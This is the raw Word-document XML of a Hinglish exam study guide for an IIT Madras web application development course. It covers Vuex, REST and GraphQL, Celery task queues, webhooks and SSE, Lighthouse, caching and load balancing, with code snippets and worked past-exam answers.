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96"/>
          <w:szCs w:val="96"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MAD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40"/>
          <w:szCs w:val="40"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Modern Application Development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4e79" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="400" w:right="40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END TERM — COMPLETE STUDY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6"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IIT Madras BSc Data Science | Weeks 7–12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Prepared for Sahil | Based on Slides + PYQs + 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400"/>
        <w:gridCol w:w="2460"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1500"/>
            <w:gridCol w:w="540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Section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Vuex State Management, SPAs, PWAs, Form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🔴 P1 — Exam Favourite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Section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API Design, REST, GraphQL, Token Auth, Vue-Flask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🔴 P1 — Always Asked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Section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Async Tasks, Celery, Message Queues, Threading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🔴 P1 — Code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Section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Webhooks, SSE, Polling, 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🟡 P2 — Theory MCQs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Section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Performance, Lighthouse, Caching, Load Balancing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🟡 P2 — MCQs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Section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Security, XSS, CSRF, SQL Injection, HTTPS, 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🔴 P1 — Every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Section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All PYQ Solutions — Aug 2025 + Dec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🔴 Must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Section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Predicted Exam Questions +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🔴 Last Night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Section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Last-Minute Cheat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🔴 Morning of Exam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2"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"Padh le bhai, ek baar aur. Tu kar sakta hai!" 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d6e4f0" w:space="0" w:sz="4" w:val="single"/>
        </w:pBdr>
        <w:shd w:fill="1f4e79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SECTION A — WEEK 7: Vuex State Management, SPAs &amp; PWAs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A1. Why Do We Need State Management? (UI = f(State))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Pehle samajhte hain — problem kya hai? Vue mein data flow hoti hai parent se child ke through PROPS se. Aur child se parent ko event bhejna ho toh $emit use karte hain. Yeh sab theek hai jab app chhota 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Lekin socho — ek large app mein 50 components hain. User ka login status, shopping cart, theme preference — yeh sab 10 different components ko chahiye. Kya har component ko props paas karte rahoge 5 levels tak? Isko bolte hain PROP DRILLING — aur yeh bahut bura experience deta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GOLDEN RULE: UI = f(State)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Matlab: Jo dikhta hai screen pe (UI) woh sirf aur sirf STATE ka function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State badlo → UI automatically update ho jaata hai. Yahi Vue ki power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Agar complete state pata ho, toh exact UI reproduce kar sakte ho. Yeh declarative programming ka core idea hai.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A2. Vuex — The Complete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Vuex ek state management library hai Vue.js ke liye. Yeh Flux architecture implement karta hai — ek unidirectional (ek direction mein) data flow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1800"/>
        <w:gridCol w:w="2160"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1200"/>
            <w:gridCol w:w="2200"/>
            <w:gridCol w:w="18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Kya hai?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Analogy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Kaise use karein?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Global shared reactive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Vue ki data() — but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this.$store.state.xxx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Computed properties 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SQL SELECT with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this.$store.getters.xxx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mutations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ONLY way to change state. MUST be SYNCHRONOUS.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Controlled setter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store.commit('name', payload)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Can be async. Commits mutations.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Async handler → triggers mutation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store.dispatch('name', payload)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Large store split into pieces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Separate tables in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store.state.moduleName.prop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7b00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WARNING — EXAM TRAP!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SABSE IMPORTANT VUEX RULE — HAR EXAM MEIN AATA HAI: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Mutations = SYNCHRONOUS ONLY. Async code NEVER mutations mein!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Actions = Async allowed. But actions directly state nahi change karte.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Actions → commit mutations → mutations change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KABHI bhi directly modify mat karo: this.$store.state.x = 5 — WRONG!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store.commit('name') → Mutation call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store.dispatch('name') → Action call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YEH DONO ULTE MAT KARNA — COMMON MISTAKE HAI!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Complete Vuex Code Example — Step by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Yeh dekho ek complete Vuex store kaise banta hai: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Step 1: Vuex Store banana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const store = new Vuex.Store({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// STATE = shared data (global variables)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state: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count: 1,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products: [],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cart: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// GETTERS = computed properties on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getters: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totalPrice(state)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// Cart ke sab items ka price add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return state.cart.reduce((total, item) =&gt; total + item.price, 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productCount(state)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return state.products.length;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// MUTATIONS = state change karne ka SINGLE way (SYNC ONLY!)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mutations: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increment(state) {          // simple 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state.count++;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incrementBy(state, n) {     // mutation with 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state.count +=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addToCart(state, product) { // object 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state.cart.push(product);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// ACTIONS = async logic (API calls, timers) → then commit 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actions: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increment({ commit })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commit('increment');  // action calls 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async fetchProducts({ commit })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const data = await fetch('/api/products').then(r =&gt; r.json());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commit('setProducts', data);  // async OK in actions!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Step 2: Component mein use karna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const Counter =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computed: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count()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return this.$store.state.count;        // state read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total()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return this.$store.getters.totalPrice;  // getter use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methods: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addOne()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this.$store.commit('increment');        // mutation call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fetchData()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this.$store.dispatch('fetchProducts'); // action call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Q (PYQ): What is the issue with a Vuex mutation that contains async operation (fetchAdminData)?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Vuex mutations MUST be synchronous.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Explanation: Async operations (like fetchAdminData().then()) inside mutations break Vuex devtools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Time-travel debugging kaam nahi karta agar mutations async hoon.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FIX: Async logic ko ACTION mein daalo, phir action mutation ko commit kare.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Wrong answer trap: 'It will still work at runtime' — technically sometimes works but is WRONG pattern!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Q (PYQ): Which statements about Vuex mutations and actions are true?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Actions can be asynchronous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Only actions should call APIs (fetch)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Mutations should modify state directly and synchronously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Mutations CAN be asynchronous — FALSE (they CANNOT)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Memory trick: M = Mutation = Must be synchronous. A = Action = Async allowed.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FALSE Statements About Vuex — Exam Mein Yeh Aate Hain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7b00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WARNING — EXAM TRAP!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'this.$vuexstore' → WRONG! Correct: this.$store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'Only direct child components can access this.$store' → WRONG! ALL descendants access kar sakte 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'A component cannot have local state if app uses Vuex' → WRONG! Local state rakh sakte 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'Actions can directly change state' → WRONG! Actions commit mutations. Mutations change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'Mutations must be synchronous'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'Vuex provides single source of truth' →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A3. Single Page Applications (SPAs)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Traditional web mein har click pe server se nayi HTML page aati hai. SPA mein ek hi HTML file load hoti hai, phir JavaScript baaki sab handle karta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Traditional MPA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Single Page Application (SPA)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Page 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Server se naya HTML har click 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Ek HTML file, JS content update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Slow — full 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Fast — sirf data fetch hoti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Website visit karne jaisa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Native app jaisa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Easy — server renders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Hard — JS execute nahi hota crawlers mein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Old PHP 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Gmail, Google Maps, Vue apps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A4. Progressive Web Apps (PWAs)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7b00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WARNING — EXAM TRAP!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EXAM TRAP: SPA ≠ PWA! Yeh DIFFERENT cheezein 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SPA = Single page navigation (JS handles routing)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PWA = SPA + offline capability + installable + service workers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Not all SPAs are PWAs. Not all PWAs are SPAs.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PWA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Kya karta hai?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Service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Background script jo network requests intercept karta hai. Offline mode enable karta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Web App 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JSON file — OS ko app ke baare mein batata hai (naam, icon, colors)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Cache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Static files cache karta hai local storage mein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Push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Server se notifications bhejta hai tab bhi jab app band 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Installable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User 'Add to Home Screen' kar sakta hai — native app jaisa feel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Q (PYQ): What distinguishes PWA from a traditional web app?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PWAs can work OFFLINE and be INSTALLED on home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Wrong options to avoid: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  - 'Downloaded from app store' — NO, PWAs are browser-based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  - 'Mobile only' — NO, PWAs work on desktop too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  - 'Need native code' — NO, pure web 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Key PWA terms to remember: Service Worker + Manifest.json + Cache API + Push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pBdr>
          <w:bottom w:color="d6e4f0" w:space="0" w:sz="4" w:val="single"/>
        </w:pBdr>
        <w:shd w:fill="1f4e79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SECTION B — WEEK 8: API Design, REST, GraphQL,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B1. What Makes a Good API?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API design karte waqt sabse pehle yeh yaad rakho: API ek CONTRACT hai. Dusre log use karenge. Isliye consistent, predictable, aur clean hona chahiye.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CORE PRINCIPLE: Think in RESOURCES (nouns) + HTTP METHODS (verbs)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BAD: /getStudent?id=123  (verb URL mein — WRONG)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GOOD: GET /students/123  (noun URL + HTTP method as verb)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URL mein KABHI verb mat daalo. HTTP method hi verb hai!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B2. REST HTTP Methods — THE Most Important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Yeh table practically har PYQ mein aata hai. Yaad karo aur samjho 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400"/>
        <w:gridCol w:w="1200"/>
        <w:gridCol w:w="2100"/>
        <w:gridCol w:w="2260"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1400"/>
            <w:gridCol w:w="2400"/>
            <w:gridCol w:w="1200"/>
            <w:gridCol w:w="2100"/>
            <w:gridCol w:w="2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HTTP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Kya karta hai?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Cacheable?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Success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Read / Fetch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✅ YES — always!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GET /students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Create new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POST /students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Replace ENTIRE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PUT /students/5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Partially update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PATCH /students/5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Remove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DELETE /students/5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204 No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7b00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WARNING — EXAM TRAP!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CACHEABILITY TRAP — HAR EXAM MEIN AATA HAI!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GET = CACHEABLE (results store karke reuse kar sakte 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POST, PUT, PATCH, DELETE = NOT CACHEABLE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WHY? GET idempotent hai — state nahi badalta. Same URL, same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POST ek naya order create karta hai har baar — cache kiya toh order create nahi hoga!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GRAPHQL TRAP: GraphQL mostly POST use karta hai → NOT cacheable by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False statement: 'REST GET requests are not cacheable' → FALSE (they ARE cacheable!)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False statement: 'GraphQL POST requests are cacheable' → FALSE (POST is NOT cacheable)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Q (PYQ): Which HTTP method is cacheable? Options: POST / PUT / GET /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Reason: GET is idempotent — yeh sirf data read karta hai, server state nahi badalta.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Isliye browser ya CDN safely same response store karke reuse kar sakta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POST/PUT/PATCH/DELETE sab side effects create karte hain — cache karna dangerous hai.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B3. REST URL Design Rules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❌ WRONG URL design (verb-based)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GET  /getStudents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POST /createStudent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GET  /deleteStudent?id=5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✅ CORRECT URL design (resource/noun-based)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GET    /students          → sab students fetch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POST   /students          → naya student create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GET    /students/5        → student ID 5 fetch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PUT    /students/5        → student 5 completely replace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PATCH  /students/5        → student 5 partially update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DELETE /students/5        → student 5 delete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Nested resources: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GET /courses/3/students   → course 3 ke sab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Filtering (query params):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GET /students?year=2&amp;dept=cs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Pagination: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GET /students?page=2&amp;limit=20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B4. Problems with REST — Why GraphQL Was Created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4860"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1500"/>
            <w:gridCol w:w="30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Kya hota hai?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Over-fetching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API 50 fields return karta hai jab tumhe sirf 2 chahiye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GET /user → 50 fields miliñ but sirf name aur email chahiye tha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Under-fetching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Ek request kaafi nahi — multiple requests chahiye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Profile show karne ke liye: GET /user + GET /posts + GET /followers = 3 requests!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Rigid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Client specify nahi kar sakta exact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Nahi bol sakte 'sirf name aur age do'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Versioning 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Breaking changes ke liye nayi version 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/v1/users → /v2/users → /v3/users...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B5. GraphQL — The Modern Alternative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GraphQL ek query language hai APIs ke liye. Yeh REST ki problems solve karta hai. Facebook ne banaya tha apne complex data needs ke liye.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GraphQL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Multiple (/users, /posts, /comments)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Single endpoint (/graphql)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Data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Fixed structure per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Client specify karta hai exact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Multiple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Multiple requests chahiye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Ek request mein sab related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Over/under-fetching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Common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Solved — exactly jo maango wo milta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HTTP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GET/POST/PUT/PATCH/DELETE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Mostly POST (sometimes GET)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GET cacheable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POST cacheable nahi by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Error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4xx/5xx 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Always 200 (error response body mein)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GraphQL Query Example — Samjho Kaise Kaam Karta Hai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Client GraphQL QUERY bhejtaa hai — exactly jo chahiye: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query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student(id: '123')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name          // sirf yeh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email         // not ALL 50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courses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Server response — ONLY requested fields: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  'data':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    'student':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      name: 'Sahil',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      email: 'sahil@iitm.ac.in',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      courses: [{ title: 'MAD2', grade: 'A' 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GraphQL Mutation (create/update/delete):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mutation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addStudent(name: 'Sahil', email: 'sahil@iitm.ac.in')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7b00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WARNING — EXAM TRAP!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GraphQL EXAM TRAPS — Yeh FALSE statements hain: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'GraphQL can only fetch from a single data source' → FALSE! Multiple sources se fuse kar sakta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'GraphQL allows only GET operations' → FALSE! Mostly POST use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'REST GET requests are not cacheable' → FALSE! GET IS cacheable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'GraphQL POST requests are cacheable' → FALSE! POST is NOT cacheable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TRUE statements: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'All GraphQL responses return 200 status code' → TRUE (errors body mein aate hain)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'GraphQL is not tied to any specific database'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'GraphQL mutations can change underlying data store' →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Q (PYQ): Which is NOT an advantage of GraphQL over REST?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Options: (a) Prevents over-fetching (b) Single endpoint (c) Simpler to implement (d) Client-specified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(c) Simpler to implement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Reason: GraphQL mein schema likhna padta hai, resolvers likhne padte hain — yeh REST se COMPLEX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REST bahut simpler hai to set up. GraphQL ka advantage = flexibility, not simplicity!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B6. Token-Based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Traditional web apps session cookies use karte hain. SPAs aur mobile apps TOKENS use karte hain — client token store karta hai aur har request ke saath bhejta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800"/>
        <w:gridCol w:w="4360"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1200"/>
            <w:gridCol w:w="38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Cookie (Session-Based)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 (JWT-Based)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Server session store karta hai; client cookie ID store karta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Stateless; token mein sab info hoti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Hard — sab servers pe session store chahiye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Easy — server pe kuch store nahi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Cross-domain mein tricky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Works across domains easily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Security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CSRF attacks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XSS risk if localStorage mein store kiya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Traditional server-rendered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SPAs, mobile apps, microservices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Flask-Security-Too: Token Auth Flow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Step 1: Client credentials bhejta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POST /login  →  { username: 'sahil', password: 'pass'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Step 2: Server token return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Response: { auth_token: 'eyJhbGciOiJIUzI1NiJ9...'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Step 3: Client har request mein token bhejta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fetch('/api/data',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headers: { 'Authentication-Token': token }  // header mein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Step 4: Flask route protect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@app.route('/api/data')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@auth_required('token', 'session')  # dono accept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def get_data():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return jsonify({'user': current_user.email})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B7. JAMStack Architecture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JAMStack = JavaScript + APIs + Markup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J = JavaScript → Client-side interactivity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A = APIs → Data from backend (REST/GraphQL)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M = Markup → Pre-built HTML (served from CDN)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Faayda: Pre-built files CDN se serve hoti hain → no server processing per request → FAST!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pBdr>
          <w:bottom w:color="d6e4f0" w:space="0" w:sz="4" w:val="single"/>
        </w:pBdr>
        <w:shd w:fill="1f4e79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SECTION C — WEEK 9: Async Tasks, Celery &amp; Message Queues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C1. The Core Problem — Why Async Tasks?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Socho ek Flask server hai. Ek user ne photos upload ki aur face recognition chalani hai. Face recognition 30 seconds leti hai. Agar Flask directly yeh kare toh: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User 30 seconds tak wait karta hai — UX terrible!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Dusre users ke requests bhi block ho jaate hain agar threading nahi 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Thread create karna bhi unlimited nahi kar sakte — server crash ho jaata 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SOLUTION: Task Queue use karo!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Web server ka kaam = quickly respond karna. Heavy work kisi aur system ko de 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Web server ka flow WITH Celery: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1. User request aati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2. Flask task queue mein task daalta hai (milliseconds mein)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3. Flask IMMEDIATELY user ko response deta hai: 'Task started, ID: xyz'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4. Celery worker BACKGROUND mein task execute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5. User baad mein status check kar sakta hai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Q (PYQ): Should a web server directly run compute-intensive tasks?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NO!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Reason: Compute-intensive tasks server ko BLOCK kar dete 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Dusre users ke requests serve nahi ho paate.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Solution: Async task queues (Celery) use karo — tasks background mein chalte hain.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C2. When to Use Async Tasks — CRITICAL Decision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Async Task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DON'T use Async Task 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Response task result pe depend nahi karta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Response MUST contain task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Emails, SMS notifications bhejna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External API se data fetch karna (response chahiye)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Image/video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Simple, fast DB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Reports generate karna (PDF, Excel)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User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Batch database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Koi bhi operation &lt;100ms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7b00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WARNING — EXAM TRAP!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COMMON MISTAKE — Yeh EXAM mein aata hai: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Async tasks backend mein ≠ async/await frontend mein!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Frontend async/await: JavaScript mein network calls handle karna (same process, non-blocking)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Backend async tasks: SEPARATE WORKER PROCESS mein heavy computation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Agar API call result chahiye response mein → async task USE MAT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Example: 'Fetch weather data aur user ko batao' → async task kaam nahi karega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Kyunki: User ko response ke saath weather data chahiye — task baad mein finish hoga!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C3. Threading in Flask — GA Question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Yeh Week 9 Graded Assignment ka core topic tha. Samjho kaise threaded vs non-threaded Flask alag behave karta hai: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NON-THREADED Flask (threaded=False):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app.run(threaded=False, debug=True)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Behavior: Ek request at a time process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Request 1 finish hone ke BAAD Request 2 start hogi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Example: 10:10:10 pe dono requests aate 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/home takes 10 seconds → response at 10:10:20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/profile takes 30 seconds → STARTS ONLY AFTER /home finishes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                           → response at 10:11:00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Console logs: 20, 50 (10:10:10+10=20sec, 10:10:10+10+30=50sec)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THREADED Flask (DEFAULT mode):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app.run(debug=True)  # threaded=True by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Behavior: Multiple requests simultaneously different threads mein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/home aur /profile simultaneously start hote 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/home → 10 seconds → response at 10:10:20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/profile → 30 seconds → response at 10:10:40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Console logs: 20, 40 (both start at :10, finish at :20 and :40)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7d4e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🎯 GRADED ASSIGNMENT (GA)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GA Q1: Flask default mode (threaded=True). Requests at 10:10:10. Console logs?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20, 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Reason: Threaded mode mein dono requests simultaneously process hoti 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/ → 10 sec delay → 10:10:10 + 10 = :20 second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/profile → 30 sec delay → 10:10:10 + 30 = :40 second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GA Q2: Flask NON-threaded mode (threaded=False). Requests at 10:10:10. Console logs?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20,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Reason: Non-threaded mein sequential — / finishes first (20 sec mark), then /profile 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/profile finishes at 10:10:10 + 10 + 30 = 50 second mark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C4. Message Queues —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Celery ko kaam karne ke liye ek MESSAGE BROKER chahiye hota hai — ek middleman jo messages store karta hai producers (Flask) aur consumers (Celery workers) ke beech.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500"/>
        <w:gridCol w:w="4060"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1800"/>
            <w:gridCol w:w="35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Task message queue mein bhejta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Flask web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Messages store aur route karta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Redis, RabbitMQ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Queue se task pick up karta hai aur execute karta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Celery worker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Result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Task results store karta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Redis, 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RabbitMQ (AMQP)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In-memory key-value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Dedicated message broker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Extremely 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Limited (data lost on restart)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Full persistence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Custom + Pub/Sub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AMQP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Simple tasks, small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Complex routing, enterprise scale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7d4e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🎯 GRADED ASSIGNMENT (GA)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GA Q3: Redis ke baare mein kaunsi statements TRUE hain?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A aur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A: Data RAM mein manipulate hoti hai → TRUE (in-memory database hai)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D: Data key-value pairs mein store hoti hai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B: Disk pe default store karta hai → FALSE (RAM pe default)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C: Data reconstruct nahi ho sakta → FALSE (disk pe save bhi kar sakte ho optionally)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C5. Celery — Complete Setup aur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Celery Python ka most popular task queue library hai. Teen cheezein chahiye Celery ke liye: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BAW Formula: Broker + App + Worker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B = Broker (Redis/RabbitMQ) — messages receive aur store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A = App (@celery.task decorated functions) — task logic define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W = Worker process (celery worker command) — tasks execute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Teeno chalna chahiye! Ek bhi missing → Celery kaam nahi karega!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celery_config.py — Celery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from celery import Celery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celery = Celery(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'tasks',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broker='redis://localhost:6379/0',    # Redis as broker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backend='redis://localhost:6379/0'    # Results bhi Redis mein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Task define karo — @celery.task decorator use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@celery.task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def send_email(user_id):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# ... yahan email bhejo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return 'Email sent to user ' + str(user_id)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Retry logic ke saath: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@celery.task(bind=True, max_retries=3)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def process_report(self, report_id):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try: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# heavy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return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except Exception as exc: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self.retry(exc=exc, countdown=60)  # 60 sec baad retry karo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Flask route mein task dispatch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@app.route('/send')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def trigger():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task = send_email.delay(user_id=5)  # NON-BLOCKING! .delay() = async dispatch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return jsonify({'task_id': task.id})  # IMMEDIATELY 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Task status check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@app.route('/status/&lt;task_id&gt;')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def status(task_id):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result = celery.AsyncResult(task_id)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return jsonify({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'status': result.status,   # PENDING / STARTED / SUCCESS /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'result': result.result    # actual result (only if SUCCESS)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Terminal Commands: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redis-server                           # Redis start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celery -A tasks worker --loglevel=info  # Worker start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flask run                              # Flask start karo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Q (PYQ): Which of the following is true about Celery?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A: Celery systems mein multiple brokers ho sakte hain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B: Workers aur clients automatically retry karte hain connection loss pe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D: Tasks monitor aur schedule karne ki features hain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C: Redis aur RabbitMQ ONLY supported brokers hain — FALSE (Amazon SQS bhi supported hai!)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C6. Message Queue Patterns — Concepts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00"/>
        <w:gridCol w:w="4160"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1800"/>
            <w:gridCol w:w="34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Point-to-Point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One producer → one queue → one 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Task delegation (Flask → Celery worker)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Pub/Sub (Fanout)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One producer → multiple subscribers consume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Notifications, broadcast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Push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Server immediately starts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Real-time: 'Send email NOW'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Pull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Worker periodically polls for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Batch: 'Nightly report generate karo'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7d4e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🎯 GRADED ASSIGNMENT (GA)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GA Q8 (Concurrency): Message queue ke baare mein kaunsi statements SAHI hain?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A, B,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A: Message queue distributed architecture mein communication provide karta hai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B: Buffer provide karta hai temporary messages store karne ke liye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D: Point-to-point messaging mein message sirf ONCE process hota hai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C: Message ek se zyada baar process hota hai → FALSE (point-to-point mein sirf once)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pBdr>
          <w:bottom w:color="d6e4f0" w:space="0" w:sz="4" w:val="single"/>
        </w:pBdr>
        <w:shd w:fill="1f4e79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SECTION D — WEEK 10: Webhooks, SSE, Polling &amp; Push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D1. Webhooks — HTTP Callbacks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Webhook ek HTTP callback hai — ek server doosre server ko notify karta hai jab koi event hota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Webhook kaise kaam karta hai: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1. Tum apna URL kisi provider ke paas register karte ho (e.g., GitHub, Stripe)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2. Jab event hota hai, provider tumhare URL pe HTTP POST bhejta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3. Tumhara server notification process karta hai aur 200 OK return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4. Webhook = SYNCHRONOUS — immediately respond karna ZARURI hai!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4860"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1500"/>
            <w:gridCol w:w="30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Tumhara server kya karta hai?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Code push to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CI/CD build trigger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Payment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Order status update karo DB mein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Twilio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SMS sending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Delivery status log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GitLab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Merge request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Team ko Slack pe notify karo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D2. Comparison — Webhook vs Other Methods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200"/>
        <w:gridCol w:w="1200"/>
        <w:gridCol w:w="1300"/>
        <w:gridCol w:w="4460"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1200"/>
            <w:gridCol w:w="1200"/>
            <w:gridCol w:w="1200"/>
            <w:gridCol w:w="13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Persistent Conn?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Server →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HTTP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Event notifications (one-shot)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Client →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HTTP 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Status periodically check karna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Long Polling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Client →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⏳ Semi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Delayed updates (connection holds)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Bidirectional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WS/WSS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Real-time 2-way (chat, gaming)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Server →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Server push (live feeds, progress)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Pub/Sub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Any → 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AMQP/etc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Scalable broadcast messaging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7b00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WARNING — EXAM TRAP!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EXAM TRAP — Comparison Questions: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Webhook = SYNCHRONOUS (respond karna padta hai immediately)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WebSocket = BIDIRECTIONAL real-time (dono side communicate kar sakte hain)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SSE = UNIDIRECTIONAL (server → client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Polling = CLIENT-initiated PULL (client periodically request karta hai)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'Webhook keeps connection open' → FALSE (one-shot hai)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'WebSocket uses HTTP only' → FALSE (upgrades to WS protocol)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'Webhook uses HTTP POST'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'Webhook is primarily server-to-server' →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7d4e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🎯 GRADED ASSIGNMENT (GA)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GA W10 Q1: Webhooks ke baare mein TRUE kaunse hain?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A aur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A: Webhook ko immediate response dena chahiye → TRUE (synchronous hai)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D: Webhook receiver ek simple Flask application ho sakta hai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B: JSON post nahi kar sakta → FALSE (JSON aur form-encoded dono kar sakta hai)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C: Public URL hone se secure nahi kar sakte → FALSE (security tokens use kar sakte ho)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D3. Server-Sent Events (SSE)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SSE server ko allow karta hai ki browser ko ek persistent HTTP connection ke upar updates push kare. WebSocket ke unlike, SSE unidirectional hai (server → client only).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Flask SSE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def event_stream():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while True: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yield f'data: {get_update()}\n\n'  # SSE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time.sleep(1)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@app.route('/stream')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def stream():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return Response(event_stream(), mimetype='text/event-stream')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Browser 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const es = new EventSource('/stream');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es.onmessage = e =&gt; console.log(e.data);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// EventSource automatically reconnects if connection drops!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7d4e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🎯 GRADED ASSIGNMENT (GA)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GA W10 Q4: Server-sent events ke baare mein FALSE kaunsa hai?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B: Task queue maintain karna padta hai → FALSE (yeh SSE ki requirement nahi)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A: Server events client ko push karta hai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C: Service workers client pe chahiye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D: Service workers background mein run karte hain →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D4. Polling — Short vs Long Poll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600"/>
        <w:gridCol w:w="4360"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1400"/>
            <w:gridCol w:w="36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Kaise kaam karta hai?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Pros/Cons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Short Polling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Client fixed intervals pe request bhejta hai (har 5 sec)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Simple; agar kuch update nahi toh bhi bandwidth waste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Long Polling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Client request karta hai; server connection hold karta hai jab tak data available na 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Efficient; but server resources use hote hain connection open rakhne mein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Persistent connection; server push karta hai jab ready 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Best for server push; one-way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Full-duplex connection once establish karo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Best for 2-way real-time; complex to implement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7d4e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🎯 GRADED ASSIGNMENT (GA)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GA W10 Q3: Short polling aur long polling ke baare mein TRUE statements?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A aur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A: Short polling mein client fixed time intervals pe repetitive requests karta hai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C: Long polling mein connection open rehta hai jab tak response na mile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B: Polling persistent connection require karta hai → FALSE (short polling mein nahi)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pBdr>
          <w:bottom w:color="d6e4f0" w:space="0" w:sz="4" w:val="single"/>
        </w:pBdr>
        <w:shd w:fill="1f4e79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SECTION E — WEEK 11: Web Performance, Caching &amp;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E1. Why Performance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'You can't optimize what you can't measure' — pehle measure karo, phir optimize karo.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Users expect &lt;3 second page load. Har 100ms delay se conversions reduce hoti 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Scaling: 10 users vs 10 million users — architecture bahut alag hoti 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UX + Cost dono improve hoti hain performance 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E2. Lighthouse — Performance Measurement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Lighthouse Google Chrome ka built-in audit tool hai. Yeh 6 Core Web Vitals measure karta hai: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7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400"/>
        <w:gridCol w:w="3000"/>
        <w:gridCol w:w="1200"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="700"/>
            <w:gridCol w:w="2400"/>
            <w:gridCol w:w="30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Kya measure karta hai?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Good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First Contentful Paint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Pehla content screen pe kab dikhta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&lt; 1.8s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Largest Contentful Paint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Main content kab render hota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&lt; 2.5s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Speed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Content visually kitni jaldi populate hota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&lt; 3.4s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Time to Interactive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Page fully interactive kab banta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&lt; 3.8s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Total Blocking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JS kitni der tak user interaction block karta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&lt; 200ms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Cumulative Layout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Content load hote waqt kitna shift hota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&lt; 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7b00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WARNING — EXAM TRAP!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LIGHTHOUSE TRAP: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Lighthouse score = PERFECT nahi hota. Gmail ka Lighthouse score poor hai but excellent app hai!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Metrics specific test scenarios reflect karte hain, real-world usage nahi.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HTTPS usage Lighthouse Performance score affect NAHI karta.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HTTPS = Best Practices score affect karta hai, not Performance.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Q (PYQ): Which factors impact Lighthouse 'Performance' score?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FCP (First Contentful Paint) + TTI (Time to Interactive) + CLS (Layout Shift)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HTTPS usage → Performance score nahi, Best Practices score affect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Number of CSS selectors → directly performance score mein nahi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Remember: FiLST CL = FCP, LCP, SI, TTI, TBT, CLS (in order)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E3. Speed Optimization Techniques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500"/>
        <w:gridCol w:w="3460"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2400"/>
            <w:gridCol w:w="35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Kya karta hai?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Compression (gzip/Brotli)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HTTP responses compress karta hai before sending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High — 60-80% size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Minification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JS/CSS se whitespace/comments remove karta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Image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Resize, compress, WebP format use karo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High — images aksar 70% of page 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Static assets user ke paas ke servers se serve karta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High — network latency reduce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Lazy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Images/components sirf viewport mein aane pe load karo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Medium — initial load improve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Code splitting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JS bundle split karo; sirf jo chahiye load karo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High for large SPAs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HTTP/2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Multiple requests ek connection pe handle karo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High — head-of-line blocking khatam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7d4e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🎯 GRADED ASSIGNMENT (GA)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GA W11 Q7: Page mein paragraph, images, aur stylesheet hai. DOMContentLoaded ya load event wait karo?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B — DOMContentLoaded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Reason: load event tab fire hota hai jab images aur stylesheets bhi load hoon.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DOMContentLoaded tab fire hota hai jab sirf HTML DOM ready ho (no wait for images).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Paragraph content update karne ke liye sirf DOM chahiye, images nahi.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Isliye DOMContentLoaded = better performance!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E4. Caching — Levels aur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Caching expensive operations ka result store karta hai taaki baar baar compute na karna pade.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400"/>
        <w:gridCol w:w="3360"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1800"/>
            <w:gridCol w:w="1800"/>
            <w:gridCol w:w="24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Cache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Kya cache hota hai?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Browser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User ka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Static files (JS, CSS, images)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Cache-Control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CDN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Edge servers (worldwide)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Static &amp; dynamic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Cloudflare, AWS CloudFront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Proxy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Reverse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API responses, HTML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Nginx, Varnish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Application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App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DB query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Redis, Memcached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Database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DB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Query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MySQL query cache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Flask-Caching — @cached vs @memoize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from flask_caching import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cache = Cache(app, config={'CACHE_TYPE': 'RedisCache',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                       'CACHE_REDIS_URL': 'redis://localhost:6379/0'})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@cache.cached() — ENTIRE VIEW/ROUTE response cache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Key = URL path (arguments ignore karta hai)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@app.route('/expensive')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@cache.cached(timeout=50)  # 50 seconds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def expensive_view():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return costly_computation()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@cache.memoize() — function result PER UNIQUE ARGUMENTS cache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Arguments ke basis pe alag cache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@cache.memoize(timeout=60)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def get_user_data(user_id):  # user_id=1 aur user_id=2 alag cache hote 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return db.query('SELECT * FROM users WHERE id = %s', user_id)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cached() vs memoize() — Yaad karne ka tarika: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E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E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cached() = Caches based on URL (no arguments matter) → Use for VIEWS/ROUTES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E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memoize() = Caches based on ARGUMENTS → Use for FUNCTIONS with different params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BOTH work the SAME for functions with NO parameters (GA W11 Q1 answer: B aur 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7d4e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🎯 GRADED ASSIGNMENT (GA)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GA W11 Q1: flask_caching ke baare mein TRUE kaunse hain?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B aur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B: memoize decorator function parameters ko cache key mein include karta hai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C: cache aur memoize dono same kaam karte hain functions ke liye jo koi parameters nahi lete →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d4e00" w:space="0" w:sz="4" w:val="single"/>
              <w:left w:color="7d4e00" w:space="0" w:sz="4" w:val="single"/>
              <w:bottom w:color="7d4e00" w:space="0" w:sz="4" w:val="single"/>
              <w:right w:color="7d4e00" w:space="0" w:sz="4" w:val="single"/>
            </w:tcBorders>
            <w:shd w:fill="fdebd0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A: cache decorator function parameters include karta hai → FALSE (only URL-based)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E5. Load Balancing aur Scaling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500"/>
        <w:gridCol w:w="4060"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1800"/>
            <w:gridCol w:w="35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Kya hai?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to use?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Horizontal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Zyada server instances add karo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Traffic zyada ho; easy to scale with load balancer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Vertical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Existing server mein RAM/CPU add karo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Quick fix; limits hote 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Round-robin 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Requests order mein distribute karo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Simple, equal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Least connections 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Server ke paas jo fewest connections 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Varying request times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IP Hash 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Same client → same server (session affinity)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Session-dependent apps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1"/>
        <w:pBdr>
